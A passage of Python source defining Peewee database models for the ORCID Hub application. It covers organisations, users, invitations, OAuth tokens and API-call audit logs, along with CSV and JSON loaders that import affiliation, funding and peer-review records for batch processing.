city = CharField(null=True)
state = CharField(null=True, verbose_name="State/Region", max_length=100)
country = CharField(null=True, choices=country_choices, default=DEFAULT_COUNTRY)
disambiguated_id = CharField(null=True)
disambiguation_source = CharField(null=True)
is_email_sent = BooleanField(default=False)
tech_contact = ForeignKeyField(
DeferredUser,
related_name="tech_contact_of",
on_delete="SET NULL",
null=True,
help_text="Organisation technical contact")
created_by = ForeignKeyField(DeferredUser, on_delete="SET NULL", null=True)
updated_by = ForeignKeyField(DeferredUser, on_delete="SET NULL", null=True)
api_credentials_requested_at = DateTimeField(
null=True,
help_text="The time stamp when the user clicked on the button to register client API.")
api_credentials_entered_at = DateTimeField(
null=True, help_text="The time stamp when the user entered API Client ID and secret.")
can_use_api = BooleanField(null=True, help_text="The organisation can access ORCID Hub API.")
logo = ForeignKeyField(
File, on_delete="CASCADE", null=True, help_text="The logo of the organisation")
email_template = TextField(null=True, db_column="email_template")
email_template_enabled = BooleanField(
null=True, default=False, db_column="email_template_enabled")
webhook_enabled = BooleanField(default=False, null=True)
email_notifications_enabled = BooleanField(default=False, null=True)
webhook_url = CharField(max_length=100, null=True)
@property
def invitation_sent_to(self):
"""Get the most recent invitation recepient."""
try:
return (self.orginvitation_set.select(
OrgInvitation.invitee).where(OrgInvitation.invitee_id == self.tech_contact_id)
.order_by(OrgInvitation.created_at.desc()).first().invitee)
except Exception:
return None
@property
def invitation_sent_at(self):
"""Get the timestamp of the most recent invitation sent to the technical contact."""
try:
return (self.orginvitation_set.select(
fn.MAX(OrgInvitation.created_at).alias("last_sent_at")).where(
OrgInvitation.invitee_id == self.tech_contact_id).first().last_sent_at)
except Exception:
return None
@property
def invitation_confirmed_at(self):
"""Get the timestamp when the invitation link was opened."""
try:
return (self.orginvitation_set.select(
fn.MAX(OrgInvitation.created_at).alias("last_confirmed_at")).where(
OrgInvitation.invitee_id == self.tech_contact_id).where(
OrgInvitation.confirmed_at.is_null(False)).first().last_confirmed_at)
except Exception:
return None
@property
def users(self):
"""Get organisation's user query."""
return User.select().join(
UserOrg, on=(UserOrg.user_id == User.id)).where(UserOrg.org == self)
@property
def admins(self):
"""Get organisation's adminstrator query."""
return self.users.where(UserOrg.is_admin)
def __repr__(self):
return self.name or self.tuakiri_name
def save(self, *args, **kwargs):
"""Handle data consitency validation and saving."""
if self.is_dirty():
if self.name is None:
self.name = self.tuakiri_name
if self.field_is_updated("tech_contact") and self.tech_contact:
if not self.tech_contact.has_role(Role.TECHNICAL):
self.tech_contact.roles |= Role.TECHNICAL
self.tech_contact.save()
app.logger.info(f"Added TECHNICAL role to user {self.tech_contact}")
super().save(*args, **kwargs)
class OrgInfo(BaseModel):
"""Preloaded organisation data."""
name = CharField(max_length=100, unique=True, verbose_name="Organisation")
tuakiri_name = CharField(max_length=100, unique=True, null=True, verbose_name="TUAKIRI Name")
title = CharField(null=True, verbose_name="Contact person tile")
first_name = CharField(null=True, verbose_name="Contact person's first name")
last_name = CharField(null=True, verbose_name="Contact person's last name")
role = CharField(null=True, verbose_name="Contact person's role")
email = CharField(null=True, verbose_name="Contact person's email")
phone = CharField(null=True, verbose_name="Contact person's phone")
is_public = BooleanField(
null=True, default=False, verbose_name="Permission to post contact information to WEB")
country = CharField(null=True, verbose_name="Country Code", default=DEFAULT_COUNTRY)
city = CharField(null=True, verbose_name="City of home campus")
disambiguated_id = CharField(
null=True, verbose_name="common:disambiguated-organization-identifier")
disambiguation_source = CharField(null=True, verbose_name="common:disambiguation-source")
def __repr__(self):
return self.name or self.disambiguated_id or super().__repr__()
class Meta: # noqa: D101,D106
db_table = "org_info"
table_alias = "oi"
@classmethod
def load_from_csv(cls, source):
"""Load data from CSV file or a string."""
if isinstance(source, str):
if '\n' in source:
source = StringIO(source)
else:
source = open(source)
reader = csv.reader(source)
header = next(reader)
assert len(header) >= 3, \
"Wrong number of fields. Expected at least 3 fields " \
"(name, disambiguated organisation ID, and disambiguation source). " \
"Read header: %s" % header
header_rexs = [
re.compile(ex, re.I)
for ex in ("organisation|name", "title", r"first\s*(name)?", r"last\s*(name)?", "role",
"email", "phone", "public|permission to post to web", r"country\s*(code)?",
"city", "(common:)?disambiguated.*identifier",
"(common:)?disambiguation.*source", r"tuakiri\s*(name)?")
]
def index(rex):
"""Return first header column index matching the given regex."""
for i, column in enumerate(header):
if rex.match(column):
return i
else:
return None
idxs = [index(rex) for rex in header_rexs]
def val(row, i, default=None):
if idxs[i] is None:
return default
else:
v = row[idxs[i]].strip()
return None if v == '' else v
for row in reader:
# skip empty lines:
if row is None or (len(row) == 1 and row[0].strip() == ''):
continue
name = val(row, 0)
oi, _ = cls.get_or_create(name=name)
oi.title = val(row, 1)
oi.first_name = val(row, 2)
oi.last_name = val(row, 3)
oi.role = val(row, 4)
oi.email = val(row, 5)
oi.phone = val(row, 6)
oi.is_public = val(row, 7) and val(row, 7).upper() == "YES"
oi.country = val(row, 8) or DEFAULT_COUNTRY
oi.city = val(row, 9)
oi.disambiguated_id = val(row, 10)
oi.disambiguation_source = val(row, 11)
oi.tuakiri_name = val(row, 12)
oi.save()
return reader.line_num - 1
class User(BaseModel, UserMixin, AuditMixin):
"""
ORCiD Hub user.
It's a gneric user including researchers, organisation administrators, hub administrators, etc.
"""
name = CharField(max_length=64, null=True)
first_name = CharField(null=True, verbose_name="Firs Name")
last_name = CharField(null=True, verbose_name="Last Name")
email = CharField(max_length=120, unique=True, null=True)
eppn = CharField(max_length=120, unique=True, null=True)
# ORCiD:
orcid = OrcidIdField(null=True, verbose_name="ORCID iD", help_text="User's ORCID iD")
confirmed = BooleanField(default=False)
# Role bit-map:
roles = SmallIntegerField(default=0)
is_locked = BooleanField(default=False)
webhook_enabled = BooleanField(default=False, null=True)
orcid_updated_at = DateTimeField(null=True, default=None)
# TODO: many-to-many
# NB! depricated!
# TODO: we still need to rememeber the rognanistiaon that last authenticated the user
organisation = ForeignKeyField(
Organisation, related_name="members", on_delete="CASCADE", null=True)
created_by = ForeignKeyField(DeferredUser, on_delete="SET NULL", null=True)
updated_by = ForeignKeyField(DeferredUser, on_delete="SET NULL", null=True)
def __repr__(self):
if self.name and (self.eppn or self.email):
return "%s (%s)" % (self.name, self.email or self.eppn)
return self.name or self.email or self.orcid or super().__repr__()
@property
def organisations(self):
"""Get all linked to the user organisation query."""
return (Organisation.select(
Organisation, (Organisation.tech_contact_id == self.id).alias("is_tech_contact"),
((UserOrg.is_admin.is_null(False)) & (UserOrg.is_admin)).alias("is_admin")).join(
UserOrg, on=((UserOrg.org_id == Organisation.id) & (UserOrg.user_id == self.id)))
.naive())
@property
def linked_accounts(self):
"""Get all linked accounts - accounts sharing the same ORCID ID."""
return [u for u in User.select().where(User.orcid == self.orcid)] if self.orcid else [self]
@property
def available_organisations(self):
"""Get all not yet linked to the user organisation query."""
return (Organisation.select(Organisation).where(UserOrg.id.is_null()).join(
UserOrg,
JOIN.LEFT_OUTER,
on=((UserOrg.org_id == Organisation.id) & (UserOrg.user_id == self.id))))
@property
def admin_for(self):
"""Get organisations the user is admin for (query)."""
return self.organisations.where(UserOrg.is_admin)
@property
def is_active(self):
"""Get 'is_active' based on confirmed for Flask-Login.
TODO: confirmed - user that email is cunfimed either by IdP or by confirmation email
ins't the same as "is active".
"""
return self.confirmed
def has_role(self, role):
"""Return `True` if the user identifies with the specified role.
:param role: A role name, `Role` instance, or integer value.
"""
if isinstance(role, Role):
return bool(role & Role(self.roles))
elif isinstance(role, str):
try:
return bool(Role[role.upper()] & Role(self.roles))
except Exception:
False
elif type(role) is int:
return bool(role & self.roles)
else:
return False
@property
def is_superuser(self):
"""Test if the user is a HUB admin."""
return bool(self.roles & Role.SUPERUSER)
@is_superuser.setter
def is_superuser(self, value): # noqa: D401
"""Sets user as a HUB admin."""
if value:
self.roles |= Role.SUPERUSER
else:
self.roles &= ~Role.SUPERUSER
@property
def is_admin(self):
"""Test if the user belongs to the organisation admin."""
return bool(self.roles & Role.ADMIN)
def avatar(self, size=40, default="identicon"):
"""Return Gravatar service user avatar URL."""
# TODO: default gravatar image
# default = "https://www.example.com/default.jpg"
gravatar_url = "https://www.gravatar.com/avatar/" + md5(
self.email.lower().encode()).hexdigest() + "?"
gravatar_url += urlencode({'d': default, 's': str(size)})
return gravatar_url
@property
def gravatar_profile_url(self):
"""Return Gravatar service user profile URL."""
return "https://www.gravatar.com/" + md5(self.email.lower().encode()).hexdigest()
@property
def affiliations(self):
"""Return affiliations with the current organisation."""
try:
user_org = UserOrg.get(user=self, org=self.organisation)
return Affiliation(user_org.affiliations)
except UserOrg.DoesNotExist:
return Affiliation.NONE
def is_tech_contact_of(self, org=None):
"""Indicats if the user is the technical contact of the organisation."""
if org is None:
org = self.organisation
return org and org.tech_contact and org.tech_contact_id == self.id
def is_admin_of(self, org=None):
"""Indicats if the user is the technical contact of the organisation."""
if org is None:
org = self.organisation
return org and UserOrg.select().where(UserOrg.user == self, UserOrg.org == org, UserOrg.is_admin).exists()
@property
def uuid(self):
"""Generate UUID for the user basee on the the primary email."""
return uuid.uuid5(uuid.NAMESPACE_URL, "mailto:" + (self.email or self.eppn))
DeferredUser.set_model(User)
class OrgInvitation(BaseModel, AuditMixin):
"""Organisation invitation to on-board the Hub."""
invitee = ForeignKeyField(
User, on_delete="CASCADE", null=True, related_name="received_org_invitations")
inviter = ForeignKeyField(
User, on_delete="SET NULL", null=True, related_name="sent_org_invitations")
org = ForeignKeyField(Organisation, on_delete="SET NULL", verbose_name="Organisation")
email = TextField(help_text="The email address the invitation was sent to.")
token = TextField(unique=True)
confirmed_at = DateTimeField(null=True)
@property
def sent_at(self):
"""Get the time the invitation was sent."""
return self.created_at
class Meta: # noqa: D101,D106
db_table = "org_invitation"
class UserOrg(BaseModel, AuditMixin):
"""Linking object for many-to-many relationship."""
user = ForeignKeyField(User, on_delete="CASCADE", index=True)
org = ForeignKeyField(
Organisation, on_delete="CASCADE", index=True, verbose_name="Organisation")
is_admin = BooleanField(
null=True, default=False, help_text="User is an administrator for the organisation")
# Affiliation bit-map:
affiliations = SmallIntegerField(default=0, null=True, verbose_name="EDU Person Affiliations")
created_by = ForeignKeyField(
User, on_delete="SET NULL", null=True, related_name="created_user_orgs")
updated_by = ForeignKeyField(
User, on_delete="SET NULL", null=True, related_name="updated_user_orgs")
# TODO: the access token should be either here or in a separate list
# access_token = CharField(max_length=120, unique=True, null=True)
def save(self, *args, **kwargs):
"""Enforce foriegn key contraints and consolidate user roles with the linked organisations.
Enforce foriegn key contraints and consolidate user roles with the linked organisations
before saving data.
"""
if self.is_dirty():
if self.field_is_updated("org"):
self.org # just enforce re-querying
user = self.user
if self.is_admin != user.is_admin:
if self.is_admin or UserOrg.select().where((UserOrg.user_id == self.user_id) & (
UserOrg.org_id != self.org_id) & UserOrg.is_admin).exists(): # noqa: E125
user.roles |= Role.ADMIN
app.logger.info(f"Added ADMIN role to user {user}")
else:
user.roles &= ~Role.ADMIN
app.logger.info(f"Revoked ADMIN role from user {user}")
user.save()
return super().save(*args, **kwargs)
class Meta: # noqa: D101,D106
db_table = "user_org"
table_alias = "uo"
indexes = ((("user", "org"), True), )
class OrcidToken(BaseModel, AuditMixin):
"""For Keeping Orcid token in the table."""
user = ForeignKeyField(User, null=True, index=True) # TODO: add validation for 3-legged authorization tokens
org = ForeignKeyField(Organisation, index=True, verbose_name="Organisation")
scope = TextField(null=True, db_column="scope") # TODO impomenet property
access_token = CharField(max_length=36, unique=True, null=True)
issue_time = DateTimeField(default=datetime.utcnow)
refresh_token = CharField(max_length=36, unique=True, null=True)
expires_in = IntegerField(default=0)
created_by = ForeignKeyField(DeferredUser, on_delete="SET NULL", null=True)
updated_by = ForeignKeyField(DeferredUser, on_delete="SET NULL", null=True)
@property
def scopes(self): # noqa: D102
if self.scope:
return self.scope.split(',')
return []
@scopes.setter
def scopes(self, value): # noqa: D102
if isinstance(value, str):
self.scope = value
else:
self.scope = ','.join(value)
class UserOrgAffiliation(BaseModel, AuditMixin):
"""For Keeping the information about the affiliation."""
user = ForeignKeyField(User)
organisation = ForeignKeyField(Organisation, index=True, verbose_name="Organisation")
disambiguated_id = CharField(verbose_name="Disambiguation ORG Id", null=True)
disambiguation_source = CharField(verbose_name="Disambiguation ORG Source", null=True)
name = TextField(null=True, verbose_name="Institution/employer")
start_date = PartialDateField(null=True)
end_date = PartialDateField(null=True)
department_name = TextField(null=True)
department_city = TextField(null=True)
role_title = TextField(null=True)
put_code = IntegerField(null=True)
path = TextField(null=True)
created_by = ForeignKeyField(DeferredUser, on_delete="SET NULL", null=True)
updated_by = ForeignKeyField(DeferredUser, on_delete="SET NULL", null=True)
class Meta: # noqa: D101,D106
db_table = "user_organisation_affiliation"
table_alias = "oua"
class OrcidApiCall(BaseModel):
"""ORCID API call audit entry."""
called_at = DateTimeField(default=datetime.utcnow)
user = ForeignKeyField(User, null=True)
method = TextField()
url = TextField()
query_params = TextField(null=True)
body = TextField(null=True)
put_code = IntegerField(null=True)
response = TextField(null=True)
response_time_ms = IntegerField(null=True)
class Meta: # noqa: D101,D106
db_table = "orcid_api_call"
class OrcidAuthorizeCall(BaseModel):
"""ORCID Authorize call audit entry."""
called_at = DateTimeField(default=datetime.utcnow)
user = ForeignKeyField(User, null=True)
method = TextField(null=True)
url = TextField(null=True)
token = TextField(null=True)
state = TextField(null=True)
response_time_ms = IntegerField(null=True)
class Meta: # noqa: D101,D106
db_table = "orcid_authorize_call"
class Task(BaseModel, AuditMixin):
"""Batch processing task created form CSV/TSV file."""
org = ForeignKeyField(
Organisation, index=True, verbose_name="Organisation", on_delete="SET NULL")
completed_at = DateTimeField(null=True)
filename = TextField(null=True)
created_by = ForeignKeyField(
User, on_delete="SET NULL", null=True, related_name="created_tasks")
updated_by = ForeignKeyField(
User, on_delete="SET NULL", null=True, related_name="updated_tasks")
task_type = SmallIntegerField(default=0)
expires_at = DateTimeField(null=True)
expiry_email_sent_at = DateTimeField(null=True)
def __repr__(self):
return self.filename or f"{TaskType(self.task_type).name.capitalize()} record processing task #{self.id}"
@property
def is_expiry_email_sent(self):
"""Test if the expiry email is sent ot not."""
return bool(self.expiry_email_sent_at)
@lazy_property
def record_count(self):
"""Get count of the loaded recoreds."""
return self.records.count()
@property
def record_model(self):
"""Get record model class."""
_, models = self.records.get_query_meta()
model, = models.keys()
return model
@lazy_property
def records(self):
"""Get all task record query."""
return getattr(self, TaskType(self.task_type).name.lower() + "_records")
@property
def error_count(self):
"""Get error count encountered during processing batch task."""
q = self.records
_, models = q.get_query_meta()
model, = models.keys()
return self.records.where(self.record_model.status ** "%error%").count()
@classmethod
def load_from_csv(cls, source, filename=None, org=None):
"""Load affiliation record data from CSV/TSV file or a string."""
if isinstance(source, str):
source = StringIO(source)
reader = csv.reader(source)
header = next(reader)
if filename is None:
if hasattr(source, "name"):
filename = source.name
else:
filename = datetime.utcnow().isoformat(timespec="seconds")
if len(header) == 1 and '\t' in header[0]:
source.seek(0)
reader = csv.reader(source, delimiter='\t')
header = next(reader)
if len(header) < 2:
raise ModelException("Expected CSV or TSV format file.")
assert len(header) >= 7, \
"Wrong number of fields. Expected at least 7 fields " \
"(first name, last name, email address, organisation, " \
"campus/department, city, course or job title, start date, end date, student/staff). " \
f"Read header: {header}"
header_rexs = [
re.compile(ex, re.I)
for ex in (r"first\s*(name)?", r"last\s*(name)?", "email", "organisation|^name",
"campus|department", "city", "state|region", "course|title|role",
r"start\s*(date)?", r"end\s*(date)?",
r"affiliation(s)?\s*(type)?|student|staff", "country", r"disambiguat.*id",
r"disambiguat.*source", r"put|code", "orcid.*", "external.*|.*identifier")
]
def index(rex):
"""Return first header column index matching the given regex."""
for i, column in enumerate(header):
if rex.match(column):
return i
else:
return None
idxs = [index(rex) for rex in header_rexs]
if all(idx is None for idx in idxs):
raise ModelException(f"Failed to map fields based on the header of the file: {header}")
if org is None:
org = current_user.organisation if current_user else None
def val(row, i, default=None):
if idxs[i] is None or idxs[i] >= len(row):
return default
else:
v = row[idxs[i]].strip()
return default if v == '' else v
with db.atomic():
try:
task = cls.create(org=org, filename=filename)
for row_no, row in enumerate(reader):
# skip empty lines:
if len(row) == 0:
continue
if len(row) == 1 and row[0].strip() == '':
continue
email = val(row, 2, "").lower()
orcid = val(row, 15)
external_id = val(row, 16)
if not email and not orcid and external_id and validators.email(external_id):
# if email is missing and exernal ID is given as a valid email, use it:
email = external_id
# The uploaded country must be from ISO 3166-1 alpha-2
country = val(row, 11)
if country:
try:
country = countries.lookup(country).alpha_2
except Exception:
raise ModelException(
f" (Country must be 2 character from ISO 3166-1 alpha-2) in the row "
f"#{row_no+2}: {row}. Header: {header}")
if not (email or orcid):
raise ModelException(
f"Missing user identifier (email address or ORCID iD) in the row "
f"#{row_no+2}: {row}. Header: {header}")
if orcid:
validate_orcid_id(orcid)
if not email or not validators.email(email):
raise ValueError(
f"Invalid email address '{email}' in the row #{row_no+2}: {row}")
affiliation_type = val(row, 10, "").lower()
if not affiliation_type or affiliation_type not in AFFILIATION_TYPES:
raise ValueError(
f"Invalid affiliation type '{affiliation_type}' in the row #{row_no+2}: {row}. "
f"Expected values: {', '.join(at for at in AFFILIATION_TYPES)}.")
af = AffiliationRecord(
task=task,
first_name=val(row, 0),
last_name=val(row, 1),
email=email,
organisation=val(row, 3),
department=val(row, 4),
city=val(row, 5),
region=val(row, 6),
role=val(row, 7),
start_date=PartialDate.create(val(row, 8)),
end_date=PartialDate.create(val(row, 9)),
affiliation_type=affiliation_type,
country=country,
disambiguated_id=val(row, 12),
disambiguation_source=val(row, 13),
put_code=val(row, 14),
orcid=orcid,
external_id=external_id)
validator = ModelValidator(af)
if not validator.validate():
raise ModelException(f"Invalid record: {validator.errors}")
af.save()
except Exception:
db.rollback()
app.logger.exception("Failed to load affiliation file.")
raise
return task
class Meta: # noqa: D101,D106
table_alias = "t"
class UserInvitation(BaseModel, AuditMixin):
"""Organisation invitation to on-board the Hub."""
invitee = ForeignKeyField(
User, on_delete="CASCADE", null=True, related_name="received_user_invitations")
inviter = ForeignKeyField(
User, on_delete="SET NULL", null=True, related_name="sent_user_invitations")
org = ForeignKeyField(
Organisation, on_delete="CASCADE", null=True, verbose_name="Organisation")
task = ForeignKeyField(Task, on_delete="CASCADE", null=True, index=True, verbose_name="Task")
email = CharField(
index=True, max_length=80, help_text="The email address the invitation was sent to.")
first_name = TextField(null=True, verbose_name="First Name")
last_name = TextField(null=True, verbose_name="Last Name")
orcid = OrcidIdField(null=True)
department = TextField(verbose_name="Campus/Department", null=True)
organisation = TextField(verbose_name="Organisation Name", null=True)
city = TextField(verbose_name="City", null=True)
state = TextField(verbose_name="State", null=True)
country = CharField(verbose_name="Country", max_length=2, null=True)
course_or_role = TextField(verbose_name="Course or Job title", null=True)
start_date = PartialDateField(verbose_name="Start date", null=True)
end_date = PartialDateField(verbose_name="End date (leave blank if current)", null=True)
affiliations = SmallIntegerField(verbose_name="User affiliations", null=True)
disambiguated_id = TextField(verbose_name="Disambiguation ORG Id", null=True)
disambiguation_source = TextField(verbose_name="Disambiguation ORG Source", null=True)
token = TextField(unique=True)
confirmed_at = DateTimeField(null=True)
@property
def sent_at(self):
"""Get the time the invitation was sent."""
return self.created_at
class Meta: # noqa: D101,D106
db_table = "user_invitation"
class RecordModel(BaseModel):
"""Commond model bits of the task records."""
def save(self, *args, **kwargs):
"""Update related batch task when changing the record."""
if self.is_dirty() and hasattr(self, "task"):
self.task.updated_at = datetime.utcnow()
self.task.save()
return super().save(*args, **kwargs)
def add_status_line(self, line):
"""Add a text line to the status for logging processing progress."""
ts = datetime.utcnow().isoformat(timespec="seconds")
self.status = (self.status + "\n" if self.status else '') + ts + ": " + line
class GroupIdRecord(RecordModel):
"""GroupID records."""
type_choices = [('publisher', 'publisher'), ('institution', 'institution'), ('journal', 'journal'),
('conference', 'conference'), ('newspaper', 'newspaper'), ('newsletter', 'newsletter'),
('magazine', 'magazine'), ('peer-review service', 'peer-review service')]
type_choices.sort(key=lambda e: e[1])
type_choices.insert(0, ("", ""))
put_code = IntegerField(null=True)
processed_at = DateTimeField(null=True)
status = TextField(null=True, help_text="Record processing status.")
name = CharField(max_length=120,
help_text="The name of the group. This can be the name of a journal (Journal of Criminal Justice),"
" a publisher (Society of Criminal Justice), or non-specific description (Legal Journal)"
" as required.")
group_id = CharField(max_length=120,
help_text="The group's identifier, formatted as type:identifier, e.g. issn:12345678. "
"This can be as specific (e.g. the journal's ISSN) or vague as required. "
"Valid types include: issn, ringgold, orcid-generated, fundref, publons.")
description = CharField(max_length=120,
help_text="A brief textual description of the group. "
"This can be as specific or vague as required.")
type = CharField(max_length=80, choices=type_choices,
help_text="One of the specified types: publisher; institution; journal; conference; newspaper; "
"newsletter; magazine; peer-review service.")
organisation = ForeignKeyField(
Organisation, related_name="organisation", on_delete="CASCADE", null=True)
class Meta: # noqa: D101,D106
db_table = "group_id_record"
table_alias = "gid"
class AffiliationRecord(RecordModel):
"""Affiliation record loaded from CSV file for batch processing."""
is_active = BooleanField(
default=False, help_text="The record is marked 'active' for batch processing", null=True)
task = ForeignKeyField(Task, related_name="affiliation_records", on_delete="CASCADE")
put_code = IntegerField(null=True)
external_id = CharField(
max_length=100,
null=True,
verbose_name="External ID",
help_text="Record identifier used in the data source system.")
processed_at = DateTimeField(null=True)
status = TextField(null=True, help_text="Record processing status.")
first_name = CharField(max_length=120, null=True)
last_name = CharField(max_length=120, null=True)
email = CharField(max_length=80, null=True)
orcid = OrcidIdField(null=True)
organisation = CharField(null=True, index=True, max_length=200)
affiliation_type = CharField(
max_length=20, null=True, choices=[(v, v) for v in AFFILIATION_TYPES])
role = CharField(null=True, verbose_name="Role/Course", max_length=100)
department = CharField(null=True, max_length=200)
start_date = PartialDateField(null=True)
end_date = PartialDateField(null=True)
city = CharField(null=True, max_length=200)
state = CharField(null=True, verbose_name="State/Region", max_length=100)
country = CharField(null=True, verbose_name="Country", max_length=2)
disambiguated_id = CharField(
null=True, max_length=20, verbose_name="Disambiguated Organization Identifier")
disambiguation_source = CharField(
null=True, max_length=100, verbose_name="Disambiguation Source")
class Meta: # noqa: D101,D106
db_table = "affiliation_record"
table_alias = "ar"
class TaskType(IntFlag):
"""Enum used to represent Task type."""
AFFILIATION = 0 # Affilation of employment/education
FUNDING = 1 # Funding
WORK = 2
PEER_REVIEW = 3
def __eq__(self, other):
if isinstance(other, TaskType):
return self.value == other.value
elif isinstance(other, int):
return self.value == other
return (self.name == other or self.name == getattr(other, "name", None))
def __hash__(self):
return hash(self.name)
class FundingRecord(RecordModel):
"""Funding record loaded from Json file for batch processing."""
task = ForeignKeyField(Task, related_name="funding_records", on_delete="CASCADE")
title = CharField(max_length=255)
translated_title = CharField(null=True, max_length=255)
translated_title_language_code = CharField(null=True, max_length=10)
type = CharField(max_length=255)
organization_defined_type = CharField(null=True, max_length=255)
short_description = CharField(null=True, max_length=4000)
amount = CharField(null=True, max_length=255)
currency = CharField(null=True, max_length=3)
start_date = PartialDateField(null=True)
end_date = PartialDateField(null=True)
org_name = CharField(null=True, max_length=255, verbose_name="Organisation Name")
city = CharField(null=True, max_length=255)
region = CharField(null=True, max_length=255)
country = CharField(null=True, max_length=255)
disambiguated_org_identifier = CharField(null=True, max_length=255)
disambiguation_source = CharField(null=True, max_length=255)
is_active = BooleanField(
default=False, help_text="The record is marked for batch processing", null=True)
processed_at = DateTimeField(null=True)
status = TextField(null=True, help_text="Record processing status.")
@classmethod
def load_from_json(cls, source, filename=None, org=None):
"""Load data from json file or a string."""
if isinstance(source, str):
# import data from file based on its extension; either it is yaml or json
funding_data_list = load_yaml_json(filename=filename, source=source)
for funding_data in funding_data_list:
validation_source_data = copy.deepcopy(funding_data)
validation_source_data = del_none(validation_source_data)
# Adding schema valdation for funding
validator = Core(
source_data=validation_source_data, schema_files=["funding_schema.yaml"])
validator.validate(raise_exception=True)
try:
if org is None:
org = current_user.organisation if current_user else None
task = Task.create(org=org, filename=filename, task_type=TaskType.FUNDING)
for funding_data in funding_data_list:
title = get_val(funding_data, "title", "title", "value")
translated_title = get_val(funding_data, "title", "translated-title", "value")
translated_title_language_code = get_val(funding_data, "title", "translated-title", "language-code")
type = funding_data.get("type")
organization_defined_type = get_val(funding_data, "organization-defined-type", "value")
short_description = funding_data.get("short-description")
amount = get_val(funding_data, "amount", "value")
currency = get_val(funding_data, "amount", "currency-code")
start_date = PartialDate.create(funding_data.get("start-date"))
end_date = PartialDate.create(funding_data.get("end-date"))
org_name = get_val(funding_data, "organization", "name")
city = get_val(funding_data, "organization", "address", "city")
region = get_val(funding_data, "organization", "address", "region")
country = get_val(funding_data, "organization", "address", "country")
disambiguated_org_identifier = get_val(funding_data, "organization", "disambiguated-organization",
"disambiguated-organization-identifier")
disambiguation_source = get_val(funding_data, "organization", "disambiguated-organization",
"disambiguation-source")
funding_record = FundingRecord.create(
task=task,
title=title,
translated_title=translated_title,
translated_title_language_code=translated_title_language_code,
type=type,
organization_defined_type=organization_defined_type,
short_description=short_description,
amount=amount,
currency=currency,
org_name=org_name,
city=city,
region=region,
country=country,
disambiguated_org_identifier=disambiguated_org_identifier,
disambiguation_source=disambiguation_source,
start_date=start_date,
end_date=end_date)
invitees_list = funding_data.get("invitees") if funding_data.get("invitees") else None
if invitees_list:
for invitee in invitees_list:
identifier = invitee.get("identifier")
email = invitee.get("email")
first_name = invitee.get("first-name")
last_name = invitee.get("last-name")
orcid_id = invitee.get("ORCID-iD")
put_code = invitee.get("put-code")
visibility = invitee.get("visibility")
FundingInvitees.create(
funding_record=funding_record,
identifier=identifier,
email=email.lower(),
first_name=first_name,
last_name=last_name,
orcid=orcid_id,
visibility=visibility,
put_code=put_code)
else:
raise SchemaError(u"Schema validation failed:\n - "
u"Expecting Invitees for which the funding record will be written")
contributors_list = funding_data.get("contributors").get("contributor") if \
funding_data.get("contributors") else None
if contributors_list:
for contributor in contributors_list:
orcid_id = get_val(contributor, "contributor-orcid", "path")
name = get_val(contributor, "credit-name", "value")
email = get_val(contributor, "contributor-email", "value")
role = get_val(contributor, "contributor-attributes", "contributor-role")
FundingContributor.create(
funding_record=funding_record,
orcid=orcid_id,
name=name,
email=email,
role=role)
external_ids_list = funding_data.get("external-ids").get("external-id") if \
funding_data.get("external-ids") else None
if external_ids_list:
for external_id in external_ids_list:
type = external_id.get("external-id-type")
value = external_id.get("external-id-value")
url = get_val(external_id, "external-id-url", "value")
relationship = external_id.get("external-id-relationship")
ExternalId.create(
funding_record=funding_record,
type=type,
value=value,
url=url,
relationship=relationship)
else:
raise SchemaError(u"Schema validation failed:\n - An external identifier is required")
return task
except Exception:
db.rollback()
app.logger.exception("Failed to load funding file.")
raise
class Meta: # noqa: D101,D106
db_table = "funding_record"
table_alias = "fr"
class PeerReviewRecord(RecordModel):
"""Peer Review record loaded from Json file for batch processing."""
task = ForeignKeyField(Task, related_name="peer_review_records", on_delete="CASCADE")
review_group_id = CharField(max_length=255)
reviewer_role = CharField(null=True, max_length=255)
review_url = CharField(null=True, max_length=255)
review_type = CharField(null=True, max_length=255)
review_completion_date = PartialDateField(null=True)
subject_external_id_type = CharField(null=True, max_length=255)
subject_external_id_value = CharField(null=True, max_length=255)
subject_external_id_url = CharField(null=True, max_length=255)
subject_external_id_relationship = CharField(null=True, max_length=255)
subject_container_name = CharField(null=True, max_length=255)
subject_type = CharField(null=True, max_length=80)
subject_name_title = CharField(null=True, max_length=255)
subject_name_subtitle = CharField(null=True, max_length=255)
subject_name_translated_title_lang_code = CharField(null=True, max_length=10)
subject_name_translated_title = CharField(null=True, max_length=255)
subject_url = CharField(null=True, max_length=255)
convening_org_name = CharField(null=True, max_length=255)
convening_org_city = CharField(null=True, max_length=255)
convening_org_region = CharField(null=True, max_length=255)
convening_org_country = CharField(null=True, max_length=255)
convening_org_disambiguated_identifier = CharField(null=True, max_length=255)
convening_org_disambiguation_source = CharField(null=True, max_length=255)
is_active = BooleanField(
default=False, help_text="The record is marked for batch processing", null=True)
processed_at = DateTimeField(null=True)
status = TextField(null=True, help_text="Record processing status.")
@classmethod
def load_from_json(cls, source, filename=None, org=None):
"""Load data from JSON file or a string."""
if isinstance(source, str):
# import data from file based on its extension; either it is yaml or json
peer_review_data_list = load_yaml_json(filename=filename, source=source)
for peer_review_data in peer_review_data_list:
validation_source_data = copy.deepcopy(peer_review_data)
validation_source_data = del_none(validation_source_data)
validator = Core(source_data=validation_source_data, schema_files=["peer_review_schema.yaml"])
validator.validate(raise_exception=True)
try:
if org is None:
org = current_user.organisation if current_user else None
task = Task.create(org=org, filename=filename, task_type=TaskType.PEER_REVIEW)
for peer_review_data in peer_review_data_list:
review_group_id = peer_review_data.get("review-group-id") if peer_review_data.get(
"review-group-id") else None
reviewer_role = peer_review_data.get("reviewer-role") if peer_review_data.get(
"reviewer-role") else None
review_url = peer_review_data.get("review-url").get("value") if peer_review_data.get(
"review-url") else None
review_type = peer_review_data.get("review-type") if peer_review_data.get("review-type") else None
review_completion_date = PartialDate.create(peer_review_data.get("review-completion-date"))
subject_external_id_type = peer_review_data.get("subject-external-identifier").get(
"external-id-type") if peer_review_data.get(
"subject-external-identifier") else None
subject_external_id_value = peer_review_data.get("subject-external-identifier").get(
"external-id-value") if peer_review_data.get(
"subject-external-identifier") else None
subject_external_id_url = peer_review_data.get("subject-external-identifier").get(
"external-id-url").get("value") if peer_review_data.get(
"subject-external-identifier") and peer_review_data.get("subject-external-identifier").get(
"external-id-url") else None
subject_external_id_relationship = peer_review_data.get("subject-external-identifier").get(
"external-id-relationship") if peer_review_data.get(
"subject-external-identifier") else None
subject_container_name = peer_review_data.get("subject-container-name").get(
"value") if peer_review_data.get(
"subject-container-name") else None
subject_type = peer_review_data.get("subject-type") if peer_review_data.get(
"subject-type") else None
